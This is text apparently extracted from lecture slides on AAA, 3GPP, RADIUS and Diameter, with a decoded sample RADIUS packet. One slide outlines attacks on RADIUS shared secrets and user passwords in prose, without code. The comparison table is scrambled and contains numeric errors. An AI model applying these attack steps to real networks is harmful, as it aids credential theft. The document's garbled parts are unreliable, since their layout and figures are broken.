Authentication, Authorization and Accounting (AAA) is a framework for intelligently controlling access to computer network resources, enforcing policies,

auditing usage, and providing the information necessary to bill for services. These combined processes are considered important for effective network management and security.
Some of the AAA Protocols are listed below: CHAP: Challenge Handshake Authentication Protocol DIAMETER Protocol: This protocol is designed to replace the RADIUS. PAP: Password Authentication Protocol RADIUS: Remote Authentication Dial-In User Service

What is 3GPP?
3GPP stands for Third Generation Partnership Project. This group includes telecommunications companies from Japan, South Korea, China, North America and Europe.

3GPP Stands for 3rd Generation Partnership Project The Partners are Standards Developing Organizations:

(Japan)

(China)

(Korea)

(USA)

(Europe)

(Japan)

Contribution driven companies participate in 3GPP through their membership of one of these Organizational Partners Currently over 350 Individual Members (Operators, Vendors, Regulators) 12 Market Representation Partners See final slide. These organisations give perspectives on market needs and drivers
4
4

 3GPP prepares and maintains specifications for the following technologies:

BT NTT DoCoMo

GSM i.e. all of the technologies GPRS on the GSM evolution path EDGE W-CDMA FDD (Frequency Division Duplex) TD-CDMA TDD (Time Division Duplex) in High Chip Rate and Low Chip Rate (TD-SCDMA) modes

The Enhanced UTRAN (E-UTRAN) will: be optimised for mobile speeds 0 to 15 km/h support, with high performance, speeds between 15 and 120 km/h maintain mobility at speeds between 120 and 350 km/h and even up to 500 km/h depending on frequency band support voice and real-time services over entire speed range with quality at least as good as UTRAN

3GPP Specified Radio Interfaces 2G radio: GSM, GPRS, EDGE 3G radio: WCDMA, HSPA, LTE 4G radio: LTE Advanced 3GPP Core Network 2G/3G: GSM core network 3G/4G: Evolved Packet Core (EPC) 3GPP Service Layer GSM services IP Multimedia Subsystem (IMS) Multimedia Telephony (MMTEL) Support of Messaging and other OMA functionality Emergency services and public warning Etc.

TSG RAN Objectives Define and further develop the UMTS (WCDMA and TDD including TD SCDMA) Radio Access Network Specify tests for User Equipment as well as Base Station TSG RAN Organization Five subgroups WG1 specifying the Layer 1 WG2 specifying the Signalling over the radio Interface WG3 specifying the architecture and the interface within the Access Network WG4 specifying the requirement for the radio performances including test specifications for Base Station WG5 specifying tests for the User Equoment inclusive of the core networks aspects

Introduction
AUTHENTICATION is to the process where an entity's identity is authenticated, typically by providing evidence that it holds a specific digital identity such as an identifier and the corresponding credentials. Examples of types of credentials are password, one time token, digital certificates, and phone numbers (calling/called). AUTHORIZATION is a process of granting or denying access to a network resource. Most computer security system is based on two step process. The 1st stage is authentication, which ensures that a user is who he or he claims to be. The 2nd stage is authorization, which allows user to various resources based on users identity. e.g.:encryptions. ACCOUNTING is a process of keeping track of a users activity while accessing the network resource, including the amount of time spent in the network the service accessed there are the amount of data transferred during the session, accounting data is used for trend analysis, capacity planning, billing and cost allocation

We divide AAA communications into the following categories: Client to Policy Enforcement Point (PEP), PEP to Policy Decision Point (PDP), Client to PDP, and PDP to Policy Information Point (PIP). For easy reference, the AAA flow diagram from Part One of this article is reproduced here.

Fig 1: A Client Connects to a AAA-Protected Network

Remote Authentication Dial In User Service (RADIUS) is a networking protocol that provides centralized Authentication, Authorization, and Accounting (AAA) management for computers to connect and use a network service. RADIUS was developed by Livingston Enterprises, in 1991.
RADIUS serves three functions: 1. to authenticate users or devices before granting them access to a network, 2. to authorize those users or devices for certain network services and 3. to account for usage of those services.

1.

2.

3.

4.

The user contact the Website and is presented with a login page. A Radius Access-Request is sent from the SSL-VPN to the Radius server. The Radius server returns an Access-Accept with authorization info. The user accesses the Intranet via the SSL-VPN portal.

Attribute value pair:

Fig2 : Structure of RADIUS

1. User initiates PPP authentication to the NAS. 2. NAS prompts for username and password (if Password Authentication Protocol [PAP]) or challenge (if Challenge Handshake Authentication Protocol [CHAP]). 3. User replies. 4. RADIUS client sends username and encrypted password to the RADIUS server. 5. RADIUS server responds with Accept, Reject, or Challenge. 6. The RADIUS client acts upon services and services parameters bundled with Accept or Reject.

The RADIUS server authenticates nemo, and sends an Access-Accept UDP packet to the NAS telling it to telnet nemo to host 192.168.1.3 The Response Authenticator is a 16-octet MD5 checksum of the code (2), id (0), Length (38), the Request Authenticator from above, the attributes in this reply, and the shared secret. 02 00 00 26 86 fe 22 0e 76 24 ba 2a 10 05 f6 bf 9b 55 e0 b2 06 06 00 00 00 01 0f 06 00 00 00 00 0e 06 c0 a8 01 03 1 Code = Access-Accept (2) 1 Identifier = 0 (same as in Access-Request) 2 Length = 38 16 Response Authenticator Attribute List: Example of Response Packates 6 Service-Type (6) = Login (1) 6 Login-Service (15) = Telnet (0) 6 Login-IP-Host (14) = 192.168.1.3

Client/Server Model Network Security Flexible Authentication Mechanisms Extensible Protocol

Response Authenticator Based Shared Secret Attack Attacker listens to requests and server responses, and precompute MD5 state, which is the prefix of the response authenticator: MD5(Code+ID+Length+ReqAuth+Attrib) Perform an exhaustive search on shared secret, adding it to the above MD5 state each time. User-Password Attribute Based Shared Secret Attack Perform an exhaustive search on shared secret. The attacker attempts a connection to the NAS, and intercepts the access-request. User-Password Based Password Attack Performs an exhaustive / dictionary attack on password, XORing it with above MD5 and sending it each time in appropriate attribute. Possible due to no authentication on request packet.

Shared Secret Hygiene Viewed as single client Small key size enabling easy attack Request Authenticator Based Attacks Passive User-Password Compromise through Repeated Request Authenticators Active User-Password Compromise through Repeated Request Authenticators Attacker builds a dictionary as before. When he predicts he can cause NAS to use a certain ReqAuth, he tries to connect it and intercepts access-request. Replay of Server Responses through Repeated Request Authenticators The attacker builds a dictionary with ReqAuth, ID and entire server response. Most server responses will be access-accept.

RADIUS has several weaknesses. Usage of stream cipher Transaction of Access-Request not authenticated at all The RADIUS specification should require each client use a different Shared Secret. It should also require the shared secret to be a random bit string at least 16 octets long that is generated by a PRNG.
DIAMETER brought in to replace RADIUS and fix some of the flaws

Diameter is an AAA (Authentication, Authorization and Accounting) protocol for applications such as network access or IP mobility. The basic concept is to provide a base protocol that can be extended in order to provide AAA services to new access technologies. Diameter is intended to work in both local and roaming AAA situations. Diameter operates on top of reliable transport protocols like TCP

FIG: AVP format:

FIG:DIAMETER PACKET STURUCTURE

Better Proxying Better Session Control Better Security Interoperability Better Transport

fig:Diameter protocol reaction time

fig:Radius protocol reaction time

fig:Traffic operated during connection to the secondary server

fig:Traffic operated during connection to the primary server

Characteristic Strict limitation

RADIUS Deficiency Only 1 byte reserved for the length of a data field (max.

DIAMETER Improvement Reserves 2 bytes for its length of a data field

of attribute data

255) in its attribute header

Inefficient retransmission algorithm Only 1 byte as identifier field to identify retransmissions. This limits the number of

(max. 16535)
Reserved 4 bytes for this purpose (max. 2^32)

requests that can be pending

(max. 255) Inability to Operates over User Scheme that regulates the

control flow to
servers

Datagram Protocol (UDP)

and has no standard scheme to regulate UDP flow

flow of UDP packets

(windowing scheme)

No
for

support
user-

Supports

vendor-

Supports
specific codes

vendor
command
25

specific attributes, but not vendor-specific

specific

commands

commands

Consumer-Managed Applications Enterprise-Managed Applications Carrier-Managed Applications Emerging Applications

Security and Identity Convergence

User-Centric AAA
Federation

RADIUS protocol Represent fast user identification with few packages. But in fact unable to control its traffic and peers in communication chain with ineffective in overly crowded networks. Diameter protocol Is recommended for congestion networks because it can control their traffic Solves the server inaccessibility problems much faster Better equipped for dealing with problems that are encountered in the present-day networks. PDF created

 untruth.org J. Liu, S. Jiang, H. Lin ibm.com originally souced from (blog within = wikipedia article)[Retrieved 2011-12-28] Bernard Aboba, Jari Arkko, David Harrington, "Introduction to Accounting Management", RFC 2975, IETF, Oct. 2000. "How Does RADIUS Work?". Cisco. 2006-01-19. Retrieved 2009-0415. RFC 2865 Remote Authentication Dial In User Service (RADIUS) RFC 2866 RADIUS Accounting Pat R. Calhoun, Glen Zorn and Ping Pan (2001-02). "DIAMETER. Framework Document". IETF. Retrieved 2009-04-30 Naman Mehta (2009-03-20). "Introduction to Diameter Protocol What is Diameter Protocol?". Sun Microsystems Retrieved 2009- 0430.

Thank you